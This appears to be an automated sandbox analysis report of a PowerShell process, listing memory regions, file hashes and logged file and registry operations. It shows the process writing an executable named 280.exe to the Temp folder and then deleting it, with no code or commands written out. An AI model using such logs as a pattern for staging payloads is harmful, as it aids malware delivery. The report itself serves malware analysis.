private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000240000 0x00240000 0x00240fff Pagefile Backed Memory Readable True False False -
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00260000 0x0027efff Memory Mapped File Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory - True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory - True False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory - True False False -
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory - True False False -
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory - True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000500000 0x00500000 0x00687fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000690000 0x00690000 0x00810fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000820000 0x00820000 0x01c1ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001c20000 0x01c20000 0x01cfefff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x01fdffff Private Memory - True False False -
private_0x0000000001fe0000 0x01fe0000 0x0201ffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0202ffff Private Memory Readable, Writable True False False -
l_intl.nls 0x02030000 0x02032fff Memory Mapped File Readable False False False -
private_0x0000000002040000 0x02040000 0x02040fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x02050000 0x02054fff Memory Mapped File Readable False False False -
microsoft.wsman.runtime.dll 0x02060000 0x02067fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000002070000 0x02070000 0x02070fff Pagefile Backed Memory Readable True False False -
private_0x0000000002080000 0x02080000 0x020bffff Private Memory Readable, Writable True False False -
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021c0000 0x021c0000 0x025b2fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000025c0000 0x025c0000 0x025c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000025d0000 0x025d0000 0x0260ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x00000000026a0000 0x026a0000 0x026dffff Private Memory Readable, Writable True False False -
sortkey.nlp 0x026e0000 0x02720fff Memory Mapped File Readable False False False -
private_0x0000000002740000 0x02740000 0x0277ffff Private Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x0288ffff Private Memory Readable, Writable True False False -
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x02900000 0x02942fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000002990000 0x02990000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable, Executable True False False -
private_0x00000000029f0000 0x029f0000 0x049effff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x049f0000 0x04aaffff Memory Mapped File Readable, Writable False False False -
private_0x0000000004ae0000 0x04ae0000 0x04b1ffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04b20000 0x04e01fff Memory Mapped File Readable, Writable, Executable False False False -
powershell.exe 0x21c10000 0x21c81fff Memory Mapped File Readable, Writable, Executable False False False -
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.management.ni.dll 0x6d7f0000 0x6d8b2fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.utility.ni.dll 0x6d8c0000 0x6da5dfff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x6da60000 0x6dafbfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.wsman.management.ni.dll 0x6db00000 0x6db84fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x6db90000 0x6ddc4fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x6ddd0000 0x6e649fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x6e650000 0x6e931fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x6e940000 0x6f0dbfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x6f0e0000 0x6fbd7fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x6fbe0000 0x7018afff Memory Mapped File Readable, Writable, Executable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74330000 0x7437bfff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74650000 0x746c9fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x746d0000 0x74719fff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x75170000 0x75194fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x751a0000 0x751eafff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x751f0000 0x75270fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x752b0000 0x752c3fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75330000 0x75339fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75350000 0x75368fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x75370000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x753e0000 0x753e8fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 89 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\280.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\temp\280.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f
SHA1: d112719238664d7996048614d75db8a67fc50fc5
SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473
False
Host Behavior
File (343)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.config type = file_attributes False 3
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\kFT6uTQW type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\kFT6uTQW\Desktop type = file_attributes True 9
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = file_type True 2
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = file_type True 2
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = file_attributes True 3
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4096 True 13
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4268 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4616 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5136 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 21484 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5508 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4664 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5840 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 1732 True 1
Fn
Data
Delete C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe - True 1
Fn
Registry (221)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
